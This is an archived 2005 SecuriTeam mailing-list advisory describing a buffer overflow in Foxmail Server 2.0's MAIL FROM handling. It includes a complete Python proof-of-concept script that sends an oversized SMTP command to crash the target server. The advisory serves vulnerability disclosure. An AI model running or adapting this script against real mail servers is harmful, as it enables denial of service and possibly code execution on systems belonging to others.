[NT] Multiple Vulnerabilities in Foxmail Server

From: SecuriTeam (support_at_securiteam.com)
Date: 02/15/05

  • Next message: SecuriTeam: "[UNIX] Buffer Overflow in OSH"
    To: list@securiteam.com
    Date: 15 Feb 2005 14:20:06 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Multiple Vulnerabilities in Foxmail Server
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.foxmail.com.cn/english/english_3.htm> Foxmail Server is the
    mail server software developed and owned by Boda Internet Technologies
    Co., Ltd, inheriting the features of ease of use and user -friendly of
    Foxmail client software."

    Multiple vulnerabilities were found in Foxmail server , which can be
    exploited by malicious people to crash the server and maybe compromise a
    vulnerable machine.

    DETAILS

    Vulnerable Systems:
     * Foxmail server for Windows version 2.0

    The vulnerabilities are caused due to boundary errors in the handling of
    the "MAIL FROM:" commands. A malicious person can exploit this by
    supplying a long, specially crafted argument to the vulnerable commands,
    which will result in a buffer overflow. Successful exploitation will cause
    a DOS and might allow execution of arbitrary code with SYSTEM privileges.

    Proof of Concept:
    #!/usr/bin/python
    #Code by OYXin
    #oyxin_at_segfault.cn
    import socket
    import sys
    import getopt

    def usage():
        print "Usage: foxserver.py -h host -p port"
        sys.exit(0)
        
    if __name__ == '__main__':
        
        try:
            opts, args = getopt.getopt(sys.argv[1:], "h:p:")
        except getopt.GetoptError, msg:
            print msg
            usage()
            
        for o,a in opts:
            if o in ["-h"]:
                host = a
            if o in ["-p"]:
                port = int(a)

        evilbuf = "MAIL-FROM: <" + "A"*5000 + ">" + "\r\n"
        evilbuf += "RCPT-TO: postmaster@company.mailDATA" + "\r\n"
        evilbuf += "Message-ID: 123" + "\r\n"
        evilbuf += "ASDF" + "\r\n"
        evilbuf += "." + "\r\n"
        evilbuf += "QUIT" + "\r\n"
        try:
            sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sockfd.connect((host, port))
            recvbuf = sockfd.recv(1024)
            print `recvbuf`
            sockfd.send("HELO localhost\r\n")
            recvbuf = sockfd.recv(1024)
            print `recvbuf`
            sockfd.send(evilbuf)
        except socket.error, msg:
            print msg
            
        sockfd.close()

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:oyxin@segfault.cn>
    (Fortinet, inc) xouyang.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[UNIX] Buffer Overflow in OSH"

    Relevant Pages

    • [NT] CA ARCServe Backup for Laptops and Desktops Multiple Buffer Overflow Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... CA ARCServe Backup for Laptops and Desktops Multiple Buffer Overflow ... Remote exploitation of multiple buffer overflow vulnerabilities in ... rxsGetSubDirs, rxsGetServerDBPathName, rxsSetServerOptions, rxsDeleteFile, ...
      (Securiteam)
    • [NT] Novell eDirectory Multiple Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Novell eDirectory Multiple Vulnerabilities ... Three different vulnerabilities were discovered in Novell's eDirectory ... NCP over IP length Heap Overflow: ...
      (Securiteam)
    • [NEWS] Multiple Vendor ImageMagick DCM and XWD Buffer Overflow Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Multiple Vendor ImageMagick DCM and XWD Buffer Overflow Vulnerabilities ...
      (Securiteam)
    • [UNIX] Apache HTTPD suEXEC Multiple Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Apache HTTPD suEXEC Multiple Vulnerabilities ... Local exploitation of multiple vulnerabilities within Apache Software ... Foundation's suexec utility could allow an attacker to execute arbitrary ...
      (Securiteam)
    • [UNIX] IBM DB2 Universal Database Multiple Privilege Escalation Vulnerabilities
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... IBM DB2 Universal Database Multiple Privilege Escalation Vulnerabilities ...
      (Securiteam)